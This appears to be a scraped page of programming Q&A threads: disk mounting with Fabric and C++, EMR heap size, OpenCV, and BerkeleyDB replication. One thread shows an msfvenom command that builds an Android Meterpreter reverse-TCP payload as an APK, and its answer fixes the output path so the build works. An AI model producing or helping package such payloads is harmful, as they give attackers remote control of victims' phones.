How do I mount a disk drive using fabric - fabric

I have been trying to use this commands in fabric to mount a disk, but my following code is not working
sudo('echo "g\r\
n\r\
1\r\
\r\
\r\
w\r\
"|fdisk /dev/xvdb', pty=False)
sudo("mkfs.ext4 /dev/xvdb", pty=False)
sudo("mkdir -p /mnt/couchbase")
append('/etc/fstab',"/dev/xvdb1 /mnt/couchbase ext4 defaults 0 0", use_sudo=True)
sudo('mount /mnt/couchbase')
Any idea how can I improve on this?

Ok I found an answer to this
sudo('echo "g\r\n\
n\r\n\
1\r\n\
%s\r\n\
%s\r\n\
"|fdisk /dev/xvdb' %('\n', '\n'))

Related

A problem to Creating metasploit payload in termux

msfvenom -p android/meterpreter/reverse_tcp LHOST= ip
LPORT=4444 R > /storage/hackmingtest.apk
bash: /storage/hackmingtest.apk: Permission denied
I use this command also (termux-setup-storage)
But it is not working
The Solution' to this Question is very simple ..
The /storage directory requires root access. I think the Location you wanna enter is /storage/emulated/0/something.apk
ALTERNATIVELY, you can also use /sdcard/whatever.apk
🖖🏻

Increase Haddop_HEAPSIZE in amazon EMR to run job with a few million input files

I am running into an issue with my EMR jobs where too many input files throws out of memory errors. Doing some research I think changing the HADOOP_HEAPSIZE config parameter is the solution. Old amazon forums from 2010 say it cannot be done.
can we do that now in 2018??
I run my jobs using the C# API for EMR and normally I set configurations using statements like below. can I set HADOOP_HEAPSIZE using similar commands.
config.Args.Insert(2, "-D");
config.Args.Insert(3, "mapreduce.output.fileoutputformat.compress=true");
config.Args.Insert(4, "-D");
config.Args.Insert(5, "mapreduce.output.fileoutputformat.compress.codec=org.apache.hadoop.io.compress.GzipCodec");
config.Args.Insert(6, "-D");
config.Args.Insert(7, "mapreduce.map.output.compress=true");
config.Args.Insert(8, "-D");
config.Args.Insert(9, "mapreduce.task.timeout=18000000");
If I need to bootstrap using a file, I can do that too. If someone can show me the contents of the file for the config change.
Thanks
I figured it out...
I created a shell script to increase the memory size on the master machine (code at the end)...
I run a bootstrap action like this
ScriptBootstrapActionConfig bootstrapActionScriptForHeapSizeIncrease = new ScriptBootstrapActionConfig
{
Path = "s3://elasticmapreduce/bootstrap-actions/run-if",
Args = new List<string> { "instance.isMaster=true", "<s3 path to my shell script>" },
};
The shell script code is this
#!/bin/bash
SIZE=8192
if ! [ -z $1 ] ; then
SIZE=$1
fi
echo "HADOOP_HEAPSIZE=${SIZE}" >> /home/hadoop/conf/hadoop-user-env.sh
Now I am able to run a EMR job with master machine tye as r3.xlarge and process 31 million input files

performance.exe in opencv autoclose when finish

i'm new to opencv,i have done the haar-training and get a decent detection. However, when i want to check my hit rate by using performance.exe, it run until finish and auto-close and i cannot check the hit rate, how to solve this? thanks
Assuming, you are running performance on command prompt; Go to the command line and run:
C:\Program Files\OpenCV\bin> performance -data TrainingSample.xml -info TestingSample\testsample.txt -sf 1.2 -w 15 -h 20 > TestResult.log
You need to place TestingSample.txt in the folder TestingImages, if you do not put the TestingSample.txt into TestingImage then performance program will execute but will not save and show any result. > TestResult.log is used to direct the result of execution to log file rather than screen, you can remove it.
Adjust OpenCV path. Please post in details if you see any more problem.
Happy Coding :)

How to set up replication in BerkeleyDB

I've been struggling for some time now on setting up a "simple" BerkeleyDB replication using the db_replicate utility.
However no luck in making it actually work, and I'm not finding any concrete example on how thing should be set up.
Here is the setup I have so far. Environment is a Debian Wheezy with BDB 5.1.29
Database generation
A simple python script reading "CSV" files and inserting each line into the BDB file
from glob import glob
from bsddb.db import DBEnv, DB
from bsddb.db import DB_CREATE, DB_PRIVATE, DB_INIT_MPOOL, DB_BTREE, DB_HASH, DB_INIT_LOCK, DB_INIT_LOG, DB_INIT_TXN, DB_INIT_REP, DB_THREAD
env = DBEnv()
env.set_cachesize(0, 1024 * 1024 * 32)
env.open('./db/', DB_INIT_MPOOL | DB_INIT_LOCK | DB_INIT_LOG |
DB_INIT_TXN | DB_CREATE | DB_INIT_REP | DB_THREAD)
db = DB(env)
db.open('apd.db', dbname='stuff', flags=DB_CREATE, dbtype=DB_BTREE)
for csvfile in glob('Stuff/*.csv'):
for line in open(csvfile):
db.put(line.strip(), None)
db.close()
env.close()
DB Configuration
In the DB_CONFIG file, this is where I'm missing the most important part I guess
repmgr_set_local_site localhost 6000
Actual replication try
# Copy the database file to begin with
db5.1_hotbackup -h ./db/ -b ./other-place
# Start replication master
db5.1_replicate -M -h db
# Then try to connect to it
db5.1_replicate -h ./other-place
The only thing I currently get from the replicate tool is:
db5.1_replicate(20648): DB_ENV->open: No such file or directory
edit after stracing the process I found out it was trying to access to __db.001, so I've copied those files manually. The current output is:
db5.1_replicate(22295): repmgr is already started
db5.1_replicate(22295): repmgr is already started
db5.1_replicate(22295): repmgr_start: Invalid argument
I suppose I'm missing the actual configuration value for the client to connect to the server, but so far no luck as all the settings yielded unrecognized name-value pair errors
Does anyone know how this setup might be completed? Maybe I'm not even headed in the right direction an this should be something completely different?

Mount NTFS device in C++ on linux?

I'm attempting to mount an external drive in my C++ application. I originally tried to use mount(2) but this fails:
int ret = mount(deviceName.c_str(), mountPoint.c_str(), fsType.c_str(), 0, NULL);
errno is 19, ENODEV (filesystem type not configured in kernel)
However, if I switch to using mount(8) it works fine:
std::string cmd = "mount -t " + fsType + " " + deviceName + " " + mountPoint;
int ret = system(cmd.c_str());
Does mount(2) have a different list of acceptable filesystem types? This is an ntfs device, so I was using ntfs-3g as the fstype. I checked /proc/filesystems and saw that this was not listed, so I tried fuseblk but that just changes the error to 22, EINVAL.
What is the correct way to mount NTFS devices using mount(2)?
mount.2 is just a kernel call. mount.8 is a complete external tool which is extended beyond what kernel does.
I think you may be looking for libmount which is a library implementing the whole mounting magic done by mount.8. Newer mount versions use it as well. It's provided in util-linux.
Have you tried running mount(8) using the strace command? It will print out the system calls made by the program, including mount(2). When I do such a mount, it spawns mount.ntfs (which is NTFS-3g) which then does a mount for fuseblk and then spins off into the background to support that mount point.
FUSE-based filesystems are handled differently because the user-space daemon must be started. Mounting with fuseblk doesn't provide enough information for the kernel to start the daemon (and the kernel doesn't even really have the information to start the daemon). For ntfs-3g, one would normally do something like ntfs-3g /dev/sda1 /mnt/windows (from the help). There isn't a programmatic way to tell the kernel to do this because it happens in user-space.